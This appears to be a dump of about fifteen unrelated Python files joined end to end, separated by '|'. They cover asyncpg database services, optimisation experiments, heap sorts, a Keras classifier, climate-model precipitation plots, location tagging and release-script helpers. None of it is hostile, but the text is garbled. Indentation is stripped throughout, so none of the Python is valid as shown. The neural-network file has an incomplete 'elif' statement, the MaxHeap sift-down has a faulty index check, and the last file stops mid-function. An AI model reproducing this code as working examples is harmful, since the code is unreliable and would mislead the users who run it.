query_str = get_hw_action_list_query
try:
if limit > 0:
query_str += ' ORDER BY hwa.id DESC LIMIT $3 OFFSET $4;'
async with request.app.pg.acquire() as connection:
rows = await connection.fetch(query_str, name, action_type, limit, offset)
else:
query_str += ' ORDER BY hwa.id DESC;'
async with request.app.pg.acquire() as connection:
rows = await connection.fetch(query_str, name, action_type)
if rows is not None:
ret_val = [dict(x) for x in rows]
except Exception as gclerr:
logger.error('get_hw_action_list service erred with: {}'.format(gclerr))
return ret_val
async def get_hw_action_list_count(
request: Request,
name: object = None,
action_type: object = None) -> int:
""" Get hw_action list count.
:param request:
:param name:
:param action_type:
:return:
"""
ret_val = 0
query_str = get_hw_action_list_count_query
try:
async with request.app.pg.acquire() as connection:
row = await connection.fetchval(query_str, name, action_type)
if row is not None:
ret_val = row
except Exception as gclcerr:
logger.error('get_hw_action_list_count service erred with: {}'.format(gclcerr))
return ret_val
async def get_hw_action_element(
request: Request,
hw_action_id: int = 0) -> dict:
""" Get hw_action element by hw_action id.
:param request:
:param hw_action_id:
:return:
"""
ret_val = {}
query_str = get_hw_action_element_query
try:
async with request.app.pg.acquire() as connection:
await connection.set_type_codec(
'json',
encoder=ujson.dumps,
decoder=ujson.loads,
schema='pg_catalog'
)
row = await connection.fetchrow(query_str, hw_action_id)
if row is not None:
ret_val = dict(row)
except Exception as gclcerr:
logger.error('get_hw_action_element service erred with: {}'.format(gclcerr))
return ret_val
async def get_hw_action_list_user_type(
request: Request) -> list:
""" Get all hw actions with user_type
:param request:
:return:
"""
ret_val = {}
query_str = get_hw_action_list_user_type_query
try:
async with request.app.pg.acquire() as connection:
await connection.set_type_codec(
'json',
encoder=ujson.dumps,
decoder=ujson.loads,
schema='pg_catalog'
)
rows = await connection.fetch(query_str)
if rows is not None:
ret_val = [dict(x) for x in rows]
print(30 * '-')
print('get_hw_action_list_user_type_query')
print(ret_val)
except Exception as gclcerr:
logger.error('get_hw_action_list_user_type service erred with: {}'.format(gclcerr))
return ret_val
async def create_hw_action_element(
request: Request,
name: str = '',
proto_field: str = '',
meta_information: dict = {},
min_value: Decimal = Decimal('0.0'),
max_value: Decimal = Decimal('100.0'),
active: bool = True) -> dict:
""" Create hw_action element
:param request:
:param name:
:param proto_field:
:param meta_information:
:param min_value:
:param max_value:
:param active:
:return:
"""
ret_val = {}
query_str = create_hw_action_element_query
try:
async with request.app.pg.acquire() as connection:
row = await connection.fetchrow(
query_str, name, proto_field, ujson.dumps(meta_information),
min_value, max_value, active)
if row is not None:
ret_val = dict(row)
except Exception as gclcerr:
logger.error('create_hw_action_element service erred with: {}'.format(gclcerr))
return ret_val
async def update_hw_action_element(
request: Request,
hw_action_id: int = 0,
name: str = '',
proto_field: str = '',
meta_information: dict = {},
min_value: Decimal = Decimal('0.0'),
max_value: Decimal = Decimal('100.0'),
active: bool = True) -> dict:
""" Update read status on hw_action element by hw_action id.
:param request:
:param hw_action_id:
:param name:
:param proto_field:
:param meta_information:
:param min_value:
:param max_value:
:param active:
:return:
"""
ret_val = {}
query_str = update_hw_action_element_query
try:
async with request.app.pg.acquire() as connection:
row = await connection.fetchrow(
query_str, hw_action_id, name,
proto_field,
ujson.dumps(meta_information),
min_value, max_value, active)
if row is not None:
ret_val = dict(row)
except Exception as gclcerr:
logger.error('update_hw_action_element_read service erred with: {}'.format(gclcerr))
return ret_val
async def delete_hw_action_element(
request: Request,
hw_action_id: int = 0) -> dict:
""" Delete hw_action element by hw_action id.
:param request:
:param hw_action_id:
:return:
"""
ret_val = {}
query_str = delete_hw_action_element_query
try:
async with request.app.pg.acquire() as connection:
row = await connection.fetchrow(query_str, hw_action_id)
if row is not None:
ret_val = dict(row)
except Exception as gclcerr:
logger.error('delete_hw_action_element service erred with: {}'.format(gclcerr))
return ret_val
|
import time
import sys
sys.path.append("./ABAGAIL-master/ABAGAIL.jar")
import dist.DiscreteDependencyTree as DiscreteDependencyTree
import dist.DiscreteUniformDistribution as DiscreteUniformDistribution
import opt.DiscreteChangeOneNeighbor as DiscreteChangeOneNeighbor
import opt.GenericHillClimbingProblem as GenericHillClimbingProblem
import opt.RandomizedHillClimbing as RandomizedHillClimbing
import opt.SimulatedAnnealing as SimulatedAnnealing
import opt.ga.SingleCrossOver as SingleCrossOver
import opt.ga.DiscreteChangeOneMutation as DiscreteChangeOneMutation
import opt.ga.GenericGeneticAlgorithmProblem as GenericGeneticAlgorithmProblem
import opt.ga.StandardGeneticAlgorithm as StandardGeneticAlgorithm
import opt.prob.GenericProbabilisticOptimizationProblem as GenericProbabilisticOptimizationProblem
import opt.prob.MIMIC as MIMIC
import shared.FixedIterationTrainer as FixedIterationTrainer
import opt.example.ContinuousPeaksEvaluationFunction as ContinuousPeaksEvaluationFunction
from array import array
from time import clock
from itertools import product
from base import *
# Adapted from https://github.com/JonathanTay/CS-7641-assignment-2/blob/master/continuouspeaks.py
"""
Commandline parameter(s):
none
"""
N = 100
T = 29
maxIters = 5551
numTrials = 1
fill = [2] * N
ranges = array('i', fill)
#outfile = './CONTPEAKS/CONTPEAKS_{}_{}_LOG.csv'
outfile = './CONTPEAKS/CONTPEAKS_@ALG@_@N@_LOG.txt'
ef = ContinuousPeaksEvaluationFunction(T)
odd = DiscreteUniformDistribution(ranges)
nf = DiscreteChangeOneNeighbor(ranges)
mf = DiscreteChangeOneMutation(ranges)
cf = SingleCrossOver()
df = DiscreteDependencyTree(.1, ranges)
hcp = GenericHillClimbingProblem(ef, odd, nf)
gap = GenericGeneticAlgorithmProblem(ef, odd, mf, cf)
pop = GenericProbabilisticOptimizationProblem(ef, odd, df)
# RHC
for t in range(numTrials):
fname = outfile.replace('@ALG@','RHC').replace('@N@',str(t+1))
with open(fname, 'w') as f:
f.write('iterations,fitness,time\n')
ef = ContinuousPeaksEvaluationFunction(T)
odd = DiscreteUniformDistribution(ranges)
nf = DiscreteChangeOneNeighbor(ranges)
hcp = GenericHillClimbingProblem(ef, odd, nf)
rhc = RandomizedHillClimbing(hcp)
fit = FixedIterationTrainer(rhc, 10)
times = [0]
for i in range(0, maxIters, 10):
start = clock()
fit.train()
elapsed = time.clock() - start
times.append(times[-1] + elapsed)
#fevals = ef.fevals
score = ef.value(rhc.getOptimal())
#ef.fevals -= 1
st = '{},{},{}\n'.format(i, score, times[-1])
print st
with open(fname, 'a') as f:
f.write(st)
# SA
for t in range(numTrials):
for CE in [0.15, 0.35, 0.55, 0.75, 0.95]:
#fname = outfile.format('SA{}'.format(CE), str(t + 1))
fname = outfile.replace('@ALG@','SA{}'.format(CE)).replace('@N@',str(t+1))
with open(fname, 'w') as f:
f.write('iterations,fitness,time\n')
ef = ContinuousPeaksEvaluationFunction(T)
odd = DiscreteUniformDistribution(ranges)
nf = DiscreteChangeOneNeighbor(ranges)
hcp = GenericHillClimbingProblem(ef, odd, nf)
sa = SimulatedAnnealing(1E10, CE, hcp)
fit = FixedIterationTrainer(sa, 10)
times = [0]
for i in range(0, maxIters, 10):
start = clock()
fit.train()
elapsed = time.clock() - start
times.append(times[-1] + elapsed)
#fevals = ef.fevals
score = ef.value(sa.getOptimal())
#ef.fevals -= 1
st = '{},{},{}\n'.format(i, score, times[-1])
print st
with open(fname, 'a') as f:
f.write(st)
# GA
for t in range(numTrials):
for pop, mate, mutate in product([100], [50, 30, 10], [50, 30, 10]):
#fname = outfile.format('GA{}_{}_{}'.format(pop, mate, mutate), str(t + 1))
fname = outfile.replace('@ALG@','GA{}_{}_{}'.format(pop,mate,mutate)).replace('@N@',str(t+1))
with open(fname, 'w') as f:
f.write('iterations,fitness,time\n')
ef = ContinuousPeaksEvaluationFunction(T)
odd = DiscreteUniformDistribution(ranges)
nf = DiscreteChangeOneNeighbor(ranges)
mf = DiscreteChangeOneMutation(ranges)
cf = SingleCrossOver()
gap = GenericGeneticAlgorithmProblem(ef, odd, mf, cf)
ga = StandardGeneticAlgorithm(pop, mate, mutate, gap)
fit = FixedIterationTrainer(ga, 10)
times = [0]
for i in range(0, maxIters, 10):
start = clock()
fit.train()
elapsed = time.clock() - start
times.append(times[-1] + elapsed)
#fevals = ef.fevals
score = ef.value(ga.getOptimal())
#ef.fevals -= 1
st = '{},{},{}\n'.format(i, score, times[-1])
print st
with open(fname, 'a') as f:
f.write(st)
# MIMIC
for t in range(numTrials):
for samples, keep, m in product([100], [50], [0.1, 0.3, 0.5, 0.7, 0.9]):
#fname = outfile.format('MIMIC{}_{}_{}'.format(samples, keep, m), str(t + 1))
fname = outfile.replace('@ALG@','MIMIC{}_{}_{}'.format(samples,keep,m)).replace('@N@',str(t+1))
with open(fname, 'w') as f:
f.write('iterations,fitness,time\n')
ef = ContinuousPeaksEvaluationFunction(T)
odd = DiscreteUniformDistribution(ranges)
nf = DiscreteChangeOneNeighbor(ranges)
mf = DiscreteChangeOneMutation(ranges)
cf = SingleCrossOver()
gap = GenericGeneticAlgorithmProblem(ef, odd, mf, cf)
df = DiscreteDependencyTree(m, ranges)
pop = GenericProbabilisticOptimizationProblem(ef, odd, df)
mimic = MIMIC(samples, keep, pop)
fit = FixedIterationTrainer(mimic, 10)
times = [0]
for i in range(0, maxIters, 10):
start = clock()
fit.train()
elapsed = time.clock() - start
times.append(times[-1] + elapsed)
#fevals = ef.fevals
score = ef.value(mimic.getOptimal())
#ef.fevals -= 1
st = '{},{},{}\n'.format(i, score, times[-1])
print st
with open(fname, 'a') as f:
f.write(st) |
#!/usr/bin/python
# -*- coding: utf-8 -*-
dividendo = "A"
divisor = 2
try:
resultado = dividendo/divisor
except ZeroDivisionError:
print "No puedes dividir por cero, animal"
except TypeError:
print "Hay que ser bruto: eso no es un número"
else:
print "La división resulta: ", resultado
|
# -*-coding:utf-8-*-
"""
堆排序
"""
import numpy as np
def create_array(num):
return np.random.randint(20, size=num)
def max_heapify(arr, i):
"""
维护堆
"""
left = 2 * i + 1
right = 2 * i + 2
if left <= len(arr) - 1 and arr[i] < arr[left]:
largest = left
else:
largest = i
if right <= len(arr) - 1 and arr[largest] < arr[right]:
largest = right
if largest != i:
arr[i], arr[largest] = arr[largest], arr[i]
max_heapify(arr, largest)
def build_max_heap(arr):
"""
建堆
"""
for i in range((len(arr) - 2) // 2, -1, -1):
max_heapify(arr, i)
def heap_sort(arr):
"""
堆排序
"""
build_max_heap(arr)
last_num = len(arr) - 1
ls = []
for i in range(last_num, -1, -1):
ls.append(arr[0])
arr[0] = arr[i]
arr = np.delete(arr, i, axis=0)
last_num -= 1
max_heapify(arr, 0)
return ls
if __name__ == '__main__':
arr1 = create_array(10)
print(arr1)
build_max_heap(arr1)
print(arr1)
arr2 = heap_sort(arr1)
print(arr2)
|
import hashlib
def get_md5(src):
src = src.encode() if type(src) == str else src
myMd5 = hashlib.md5()
myMd5.update(src)
myMd5_Digest = myMd5.hexdigest()
return myMd5_Digest
|
import copy
a=[10,20,[5,6]]
b=copy.copy(a)
b.append(30)
b[1]=10
print(b)
print(a) |
import sklearn.preprocessing
import tensorflow.keras as keras
import tensorflow as tf
import pandas
tf.random.set_seed(1)
dataframe = pandas.read_csv("data/breast-cancer/data.csv", index_col="id")
y = dataframe.diagnosis
x = dataframe.drop("diagnosis", 1)
scaler = sklearn.preprocessing.RobustScaler()
scaler.fit(x)
X = scaler.transform(x)
y = keras.utils.to_categorical(y)
model = keras.Sequential([
keras.layers.Dense(30, activation=tf.nn.relu,
input_shape=(x.shape[1],)),
keras.layers.Dense(30, activation=tf.nn.relu),
keras.layers.Dense(30, activation=tf.nn.relu),
keras.layers.Dense(2, activation=tf.nn.softmax)
])
model.compile(loss="categorical_crossentropy",metrics=['accuracy'])
# for 2 categories bce ~= cce
model.summary()
history = model.fit(x, y, epochs=100, batch_size=10, validation_split=0.2)
eval = model.evaluate(x, y)
print(eval)
print(f"Total accuracy: {history.history['val_accuracy'][-1]*100:.2f}%")
|
class MaxHeap(object):
def __init__(self, maxSize=None):
self.maxSize = maxSize
self._elements = [None] * maxSize
self._count = 0
def __len__(self):
return self._count
def add(self, value):
if self._count >= self.maxSize:
raise Exception("full")
self._elements[self._count] = value
self._count += 1
self._siftup(self._count - 1)
def _siftup(self, ndx):
if ndx > 0:
parent = (ndx - 1) // 2
if self._elements[ndx] > self._elements[parent]:
self._elements[ndx], self._elements[parent] = self._elements[parent], self._elements[ndx]
self._siftup(parent)
def extract(self):
if self._count <= 0:
raise Exception("empty")
value = self._elements[0]
self._count -= 1
self._elements[0] = self._elements[self._count]
self._siftdown(0)
return value
def _siftdown(self, ndx):
left = 2 * ndx + 1
right = 2 * ndx + 2
largest = ndx
# 左右都有
if right < self._count:
if self._elements[left] > self._elements[right] and self._elements[left] > self._elements[largest]:
largest = left
elif self._elements[right] >= self._elements[left] and self._elements[right] >= self._elements[largest]:
largest = right
# 只有一个
elif left == self._count:
if self._elements[left] > self._elements[largest]:
largest = left
# 没有子孩子
else:
largest = ndx
if largest != ndx:
self._elements[ndx], self._elements[largest] = self._elements[largest], self._elements[ndx]
self._siftdown(largest)
def test_maxheap():
import random
h = MaxHeap(100000000)
for i in range(10000):
h.add(random.randint(0, 10000))
for i in reversed(range(10000)):
print(h.extract())
if __name__ == '__main__':
test_maxheap()
|
"""
Base class
"""
class BaseTestCase:
BASE_PATH = "testdata/apidata"
BASE_URL = "https://www.googleapis.com/youtube/v3"
RESOURCE = "CHANNELS"
@property
def url(self):
return f"{self.BASE_URL}/{self.RESOURCE}"
def load_json(self, filename, helpers):
return helpers.load_json(f"{self.BASE_PATH}/{filename}")
|
"""
Heber Cooke 10/15/2019
Chapter 4 Exercise 4
Convert a decimal number to an octal number
"""
#decimal to octal
decimal = int(input("Enter a Decimal number: "))
if decimal == 0:
print(0)
else:
bString = ""
while decimal > 0:
remainder = decimal % 8
decimal = decimal // 8
bString = str(remainder) + bString
print("The Octal number is: ", bString) |
import numpy as np
class ActivationRelu(object):
def __init__(self, *args, **kwargs):
self.nama = kwargs.get('nama', None)
def compute_activation(self, total_net, derivative=False):
if derivative:
total_net[total_net <= 0] = 0
total_net[total_net > 0] = 1
return total_net
return np.maximum(total_net, 0)
class ActivationSoftmax(object):
def __init__(self, *args, **kwargs):
self.nama = kwargs.get('nama', None)
def compute_activation(self, total_net, derivative=False):
if derivative:
return total_net
e_x = np.exp(total_net - np.max(total_net))
return e_x / e_x.sum(axis=0)
class Layer(object):
def __init__(self, neuron, **kwargs):
self.neuron_num = neuron
self.activation = kwargs.get('activation', None)
self.weights = kwargs.get('weights', None)
self.biases = kwargs.get('biases', None)
def compute_total_net(self, input_net):
return np.add(np.dot(input_net, self.weights), self.biases)
def compute_activation(self, total_net):
elif self.activation ==
class NeuralNetworkAlgoritm(object):
def __init__(self, *args, **kwargs):
self.layers = []
def compile(self, **kwargs):
current_input = kwargs['input_num']
for layer in self.layers:
if layer.weights == None:
layer.weights = np.random.randn(current_input, layer.neuron_num)
if layer.biases == None:
layer.biases = np.random.randn(layer.neuron_num)
if layer.activation == 'relu':
layer.activation = ActivationRelu(nama='relu')
elif layer.activation == 'softmax':
layer.activation = ActivationSoftmax(nama='softmax')
current_input = layer.neuron_num
def add(self, layer):
self.layers.append(layer)
def train(self, input_net, output_net, epoch):
current_input = input_net
for layer in self.layers:
layer.total_net = layer.compute_total_net(current_input)
layer.output = layer.compute_activation(layer.total_net)
current_input = layer.output |
import json
import re
from tqdm import tqdm
userdata = []
with open("../data/state_synsets.txt", encoding = 'utf-8', mode = 'r') as f:
state_mapping = json.load(f)
city_mapping = {}
find_state = re.compile("(\(\w{2}\))")
find_city = re.compile("(.+ )")
with open("../data/german_cities_raw.txt", encoding = 'utf-8', mode='r') as f:
for entry in f:
city = find_city.findall(entry)[0].strip()
state = find_state.findall(entry)[0].replace("(","").replace(")","")
city_mapping[city] = state
# city_mapping[city] = ""
def is_german_city(x):
if (not any(city.lower() in x.lower() for city in city_mapping.keys()) and
not any(state.lower() in x.lower() for state in state_mapping.keys())):
print(x)
def map_cities(location):
matches = []
for city in city_mapping.keys():
if city in location:
matches.append(city)
return list(set(matches))
# matches = [city.lower() in location for city in city_mapping.keys()]
def map_states(location):
matches = []
for city in city_mapping.keys():
if city in location:
matches.append(city_mapping[city])
for state in state_mapping.keys():
if state in location:
matches.append(state_mapping[state])
return list(set(matches))
with open("../data/users_fully_hydrated.json", encoding='utf-8', mode='r') as f:
inf = f.read()
userdata = json.loads(inf)
result = []
print("Annotating location..")
for user in tqdm(userdata):
user['state'] = map_states(user['location'])
user['city'] = map_cities(user['location'])
result.append(user)
print("Done.")
with open("../data/users_with-loc.json", encoding = 'utf-8', mode='w') as f:
json.dump(result,f ,indent = 2,ensure_ascii=False)
|
#!/usr/bin/env python
from os.path import join
import numpy as np
import matplotlib
matplotlib.use('Agg')
import matplotlib.pyplot as plt
import netCDF4 as nc4
from e3sm_case_output import day_str
OUTPUT_DIR = "/p/lustre2/santos36/timestep_precip/"
FOCUS_PRECIP = True
USE_PRESAER = False
LAND_TROPICS = False
TROPICS_ONLY = False
if LAND_TROPICS:
TROPICS_ONLY = True
assert not (FOCUS_PRECIP and USE_PRESAER), \
"no precipitation-specific prescribed aerosol run set has been defined"
START_DAY = 3
END_DAY = 15
if USE_PRESAER:
REF_CASE_NAME = "timestep_presaer_ctrl"
TEST_CASE_NAMES = [
"timestep_presaer_ZM_10s",
"timestep_presaer_CLUBB_MG2_10s",
"timestep_presaer_CLUBB_MG2_10s_ZM_10s",
"timestep_presaer_cld_10s",
"timestep_presaer_all_10s",
"timestep_presaer_ZM_10s_lower_tau",
"timestep_presaer_CLUBB_MG2_10s_ZM_10s_lower_tau",
"timestep_presaer_cld_10s_lower_tau",
"timestep_presaer_all_10s_lower_tau",
]
SHORT_TEST_CASE_NAMES = [
"ZM10PA",
"CLUBBMICRO10PA",
"CLUBBMICRO10ZM10PA",
"CLD10PA",
"ALL10PA",
"ZM10LTPA",
"CLUBBMICRO10ZM10LTPA",
"CLD10LTPA",
"ALL10LTPA",
]
STYLES = {
"CLUBBMICRO10PA": ('indigo', '-'),
"ALL10PA": ('dimgrey', '-'),
"ZM10PA": ('g', '-'),
"CLUBBMICRO10ZM10PA": ('saddlebrown', '-'),
"CLD10PA": ('slateblue', '-'),
"ALL10LTPA": ('dimgrey', '-.'),
"ZM10LTPA": ('g', '-.'),
"CLUBBMICRO10ZM10LTPA": ('saddlebrown', '-.'),
"CLD10LTPA": ('slateblue', '-.'),
}
elif FOCUS_PRECIP:
REF_CASE_NAME = "timestep_ctrl"
TEST_CASE_NAMES = [
"timestep_MG2_10s",
# "timestep_CLUBB_10s_MG2_10s",
# "timestep_CLUBB_MG2_60s",
"timestep_CLUBB_MG2_10s",
# "timestep_all_10s",
# "timestep_all_300s",
"timestep_precip_grad",
"timestep_precip_grad_MG2_10s",
"timestep_precip_grad_CLUBB_MG2_10s",
]
SHORT_TEST_CASE_NAMES = [
"MICRO10",
# "CLUBB10MICRO10",
# "CLUBBMICRO60",
"CLUBBMICRO10",
# "ALL10",
# "ALL300",
"PFMG",
"PFMGMICRO10",
"PFMGCLUBBMICRO10",
]
STYLES = {
"MICRO10": ('r', '-'),
# "CLUBB10MICRO10": ('maroon', '-'),
# "CLUBBMICRO60": ('indigo', '--'),
"CLUBBMICRO10": ('indigo', '-'),
# "ALL10": ('dimgrey', '-'),
# "ALL300": ('dimgrey', ':'),
"PFMG": ('k', '-.'),
"PFMGMICRO10": ('r', '-.'),
"PFMGCLUBBMICRO10": ('indigo', '-.'),
}
else:
REF_CASE_NAME = "timestep_ctrl"
TEST_CASE_NAMES = [
"timestep_dyn_10s",
"timestep_CLUBB_10s",
"timestep_MG2_10s",
"timestep_CLUBB_10s_MG2_10s",
"timestep_CLUBB_MG2_Strang",
"timestep_CLUBB_MG2_Strang_60s",
"timestep_CLUBB_MG2_60s",
"timestep_CLUBB_MG2_10s",
"timestep_all_10s",
"timestep_all_60s",
"timestep_all_300s",
"timestep_all_rad_10s",
]
SHORT_TEST_CASE_NAMES = [
"DYN10",
"CLUBB10",
"MICRO10",
"CLUBB10MICRO10",
"CLUBBMICROSTR",
"CLUBBMICROSTR60",
"CLUBBMICRO60",
"CLUBBMICRO10",
"ALL10",
"ALL60",
"ALL300",
"ALLRAD10",
]
STYLES = {
"DYN10": ('y', '-'),
"CLUBB10": ('b', '-'),
"MICRO10": ('r', '-'),
"CLUBB10MICRO10": ('maroon', '-'),
"CLUBBMICROSTR": ('m', '-'),
"CLUBBMICROSTR60": ('m', '--'),
"CLUBBMICRO60": ('indigo', '--'),
"CLUBBMICRO10": ('indigo', '-'),
"ALL10": ('dimgrey', '-'),
"ALL60": ('dimgrey', '--'),
"ALL300": ('dimgrey', ':'),
"ALLRAD10": ('orange', '-'),
}
num_tests = len(TEST_CASE_NAMES)
suffix = '_d{}-d{}'.format(day_str(START_DAY), day_str(END_DAY))
if FOCUS_PRECIP:
suffix += '_precip'
if USE_PRESAER:
suffix += '_presaer'
if TROPICS_ONLY:
if LAND_TROPICS:
suffix += '_lndtropics'
else:
suffix += '_tropics'
log_file = open("plot_precip_log{}.txt".format(suffix), 'w')
out_file_template = "{}.freq.short.d{}-d{}.nc"
first_file_name = out_file_template.format(REF_CASE_NAME, day_str(START_DAY),
day_str(END_DAY))
first_file = nc4.Dataset(join(OUTPUT_DIR, first_file_name), 'r')
ncol = len(first_file.dimensions['ncol'])
nbins = len(first_file.dimensions['nbins'])
bin_lower_bounds = first_file['bin_lower_bounds'][:]
bin_width = np.log(bin_lower_bounds[2] / bin_lower_bounds[1])
lat = first_file['lat'][:]
lon = first_file['lon'][:]
area = first_file['area'][:]
# For tropics_only cases, just use a weight of 0 for all other columns.
if TROPICS_ONLY:
if LAND_TROPICS:
# Just pick a random file with the same grid as the run.
landfrac_file_name = '/p/lustre2/santos36/timestep_monthly_avgs/timestep_ctrl.0001-01.nc'
landfrac_file = nc4.Dataset(landfrac_file_name, 'r')
landfrac = landfrac_file['LANDFRAC'][0,:]
for i in range(ncol):
if np.abs(lat[i]) > 30.:
area[i] = 0.
else:
area[i] *= landfrac[i]
landfrac_file.close()
else:
for i in range(ncol):
if np.abs(lat[i]) > 30.:
area[i] = 0.
area_sum = area.sum()
weights = area/area_sum
first_file.close()
ref_sample_num_total = 0
test_sample_num_totals = [0 for i in range(num_tests)]
prec_vars = ("PRECC", "PRECL", "PRECT")
ref_num_avgs = {}
ref_amount_avgs = {}
for var in prec_vars:
ref_num_avgs[var] = np.zeros((nbins,))
ref_amount_avgs[var] = np.zeros((nbins,))
test_num_avgs = [{} for i in range (num_tests)]
test_amount_avgs = [{} for i in range (num_tests)]
for i in range(num_tests):
for var in prec_vars:
test_num_avgs[i][var] = np.zeros((nbins,))
test_amount_avgs[i][var] = np.zeros((nbins,))
out_file_name = out_file_template.format(REF_CASE_NAME, day_str(START_DAY),
day_str(END_DAY))
out_file = nc4.Dataset(join(OUTPUT_DIR, out_file_name), 'r')
ref_sample_num_total += out_file.sample_num
for var in prec_vars:
num_name = "{}_num".format(var)
amount_name = "{}_amount".format(var)
for j in range(ncol):
ref_num_avgs[var] += out_file[num_name][j,:] * weights[j]
for j in range(ncol):
ref_amount_avgs[var] += out_file[amount_name][j,:] * weights[j]
for i in range(num_tests):
out_file_name = out_file_template.format(TEST_CASE_NAMES[i], day_str(START_DAY),
day_str(END_DAY))
out_file = nc4.Dataset(join(OUTPUT_DIR, out_file_name), 'r')
test_sample_num_totals[i] += out_file.sample_num
for var in prec_vars:
num_name = "{}_num".format(var)
amount_name = "{}_amount".format(var)
for j in range(ncol):
test_num_avgs[i][var] += out_file[num_name][j,:] * weights[j]
for j in range(ncol):
test_amount_avgs[i][var] += out_file[amount_name][j,:] * weights[j]
for var in prec_vars:
ref_num_avgs[var] /= ref_sample_num_total
ref_amount_avgs[var] /= ref_sample_num_total
for i in range(num_tests):
test_num_avgs[i][var] /= test_sample_num_totals[i]
test_amount_avgs[i][var] /= test_sample_num_totals[i]
# Threshold for precipitation to be considered "extreme", in mm/day.
PRECE_THRESHOLD = 97.
ibinthresh = -1
for i in range(nbins):
if bin_lower_bounds[i] > PRECE_THRESHOLD:
ibinthresh = i
break
if ibinthresh == -1:
print("Warning: extreme precip threshold greater than largest bin bound.")
for var in prec_vars:
# Leave out zero bin from loglog plot.
plt.loglog(bin_lower_bounds[1:], ref_num_avgs[var][1:], 'k')
for i in range(num_tests):
plt.loglog(bin_lower_bounds[1:], test_num_avgs[i][var][1:],
color=STYLES[SHORT_TEST_CASE_NAMES[i]][0],
linestyle=STYLES[SHORT_TEST_CASE_NAMES[i]][1])
plt.title("Frequency distribution of precipitation (days {}-{})".format(
day_str(START_DAY), day_str(END_DAY)))
plt.xlabel("Precipitation intensity (mm/day)")
plt.ylabel("fraction")
plt.savefig("{}_freq{}.png".format(var, suffix))
plt.close()
plt.semilogx(bin_lower_bounds[1:], ref_amount_avgs[var][1:] / bin_width, 'k')
if var == "PRECT":
print("Extreme precipitation rate for reference: ",
ref_amount_avgs[var][ibinthresh:].sum(),
file=log_file)
for i in range(num_tests):
plt.semilogx(bin_lower_bounds[1:], test_amount_avgs[i][var][1:] / bin_width,
color=STYLES[SHORT_TEST_CASE_NAMES[i]][0],
linestyle=STYLES[SHORT_TEST_CASE_NAMES[i]][1])
if var == "PRECT":
print("Extreme precipitation rate for ", SHORT_TEST_CASE_NAMES[i], ": ",
test_amount_avgs[i][var][ibinthresh:].sum(), "(Diff = ",
test_amount_avgs[i][var][ibinthresh:].sum() - ref_amount_avgs[var][ibinthresh:].sum(), ")",
file=log_file)
plt.title("Amounts of precipitation (days {}-{})".format(
day_str(START_DAY), day_str(END_DAY)))
plt.xlabel("Precipitation intensity (mm/day)")
plt.ylabel("Average precipitation amount (mm/day)")
plt.savefig("{}_amount{}.png".format(var, suffix))
plt.close()
log_file.close()
|
"""Shared functions for release script Python files"""
from collections import namedtuple
from contextlib import asynccontextmanager
from datetime import datetime, timedelta, timezone
from difflib import SequenceMatcher
import json
import os
import re
from tempfile import TemporaryDirectory
from dateutil.parser import parse
from async_subprocess import call, check_call, check_output
from constants import SCRIPT_DIR, WEB_APPLICATION_TYPE
from exception import ReleaseException
from github import (
get_pull_request,
get_org_and_repo,
)
from repo_info import RepoInfo
ReleasePR = namedtuple("ReleasePR", ['version', 'url', 'body'])
VERSION_RE = r'\d+\.\d+\.\d+'
COMMIT_HASH_RE = r'^[a-z0-9]+$'
def parse_checkmarks(body):
"""
Parse PR message with checkboxes
Args:
body (str): The text of the pull request
Returns:
list of dict:
A list of commits with a dict like:
{
"checked": whether the author checked off their box
"author_name": The author's name
"title": The title of the commit
}
"""
commits = []
current_name = None
for line in body.split("\n"):
if line.startswith("## "):
current_name = line[3:].strip()
elif line.startswith(" - ["):
checked = False
if line.startswith(" - [x]"):
checked = True
start = line.find("]")
end = line.rfind("([")
if start != -1 and end != -1:
title = line[start + 1:end].strip()
commits.append({
"checked": checked,
"title": title,
"author_name": current_name,
})
return commits
async def get_release_pr(*, github_access_token, org, repo):
"""
Look up the pull request information for a release, or return None if it doesn't exist
Args:
github_access_token (str): The github access token
org (str): The github organization (eg mitodl)
repo (str): The github repository (eg micromasters)
Returns:
ReleasePR: The information about the release pull request, or None if there is no release PR in progress
"""
pr = await get_pull_request(
github_access_token=github_access_token,
org=org,
repo=repo,
branch='release-candidate',
)
if pr is None:
return None
title = pr['title']
match = re.match(r'^Release (?P<version>\d+\.\d+\.\d+)$', title)
if not match:
raise ReleaseException("Release PR title has an unexpected format")
version = match.group('version')
return ReleasePR(
version=version,
body=pr['body'],
url=pr['html_url'],
)
async def get_unchecked_authors(*, github_access_token, org, repo):
"""
Returns list of authors who have not yet checked off their checkboxes
Args:
github_access_token (str): The github access token
org (str): The github organization (eg mitodl)
repo (str): The github repository (eg micromasters)
Returns:
set[str]: A set of github usernames
"""
release_pr = await get_release_pr(
github_access_token=github_access_token,
org=org,
repo=repo,
)
if not release_pr:
raise ReleaseException("No release PR found")
body = release_pr.body
commits = parse_checkmarks(body)
return {commit['author_name'] for commit in commits if not commit['checked']}
def next_workday_at_10(now):
"""
Return time which is 10am the next day, or the following Monday if it lands on the weekend
Args:
now (datetime): The current time
Returns:
datetime:
10am the next day or on the following Monday of a weekend
"""
tomorrow = now + timedelta(days=1)
next_weekday = tomorrow
while next_weekday.isoweekday() > 5:
# If Saturday or Sunday, go to next day
next_weekday += timedelta(days=1)
return datetime(
year=next_weekday.year,
month=next_weekday.month,
day=next_weekday.day,
hour=10,
tzinfo=now.tzinfo,
)
def reformatted_full_name(full_name):
"""
Make the full name lowercase and split it so we can more easily calculate its similarity
Args:
full_name (str): The user's full name
Returns:
str: The name in lowercase, removing the middle names
"""
pieces = full_name.lower().split()
if len(pieces) >= 2:
return "{} {}".format(pieces[0], pieces[-1])
elif len(pieces) == 1:
return pieces[0]
return ''
def format_user_id(user_id):
"""
Format user id so Slack tags it
Args:
user_id (str): A slack user id
Returns:
str: A user id in a Slack tag
"""
return "<@{id}>".format(id=user_id)
def match_user(slack_users, author_name, threshold=0.8):
"""
Do a fuzzy match of author name to full name. If it matches, return a formatted Slack handle. Else return original
full name.
Args:
slack_users (list of dict): A list of slack users from their API
author_name (str): The commit author's full name
threshold (float): All matches must be at least this high to pass.
Returns:
str: The slack markup for the handle of that author.
If one can't be found, the author's name is returned unaltered.
"""
lower_author_name = reformatted_full_name(author_name)
def match_for_user(slack_user):
"""Get match ratio for slack user, or 0 if below threshold"""
real_name = slack_user['profile']['real_name']
lower_name = reformatted_full_name(real_name)
ratio = SequenceMatcher(a=lower_author_name, b=lower_name).ratio()
if ratio >= threshold:
return ratio
if " " not in lower_author_name:
lower_name = lower_name.split()[0]
ratio = SequenceMatcher(a=lower_author_name, b=lower_name).ratio()
if ratio >= threshold:
return ratio
return 0
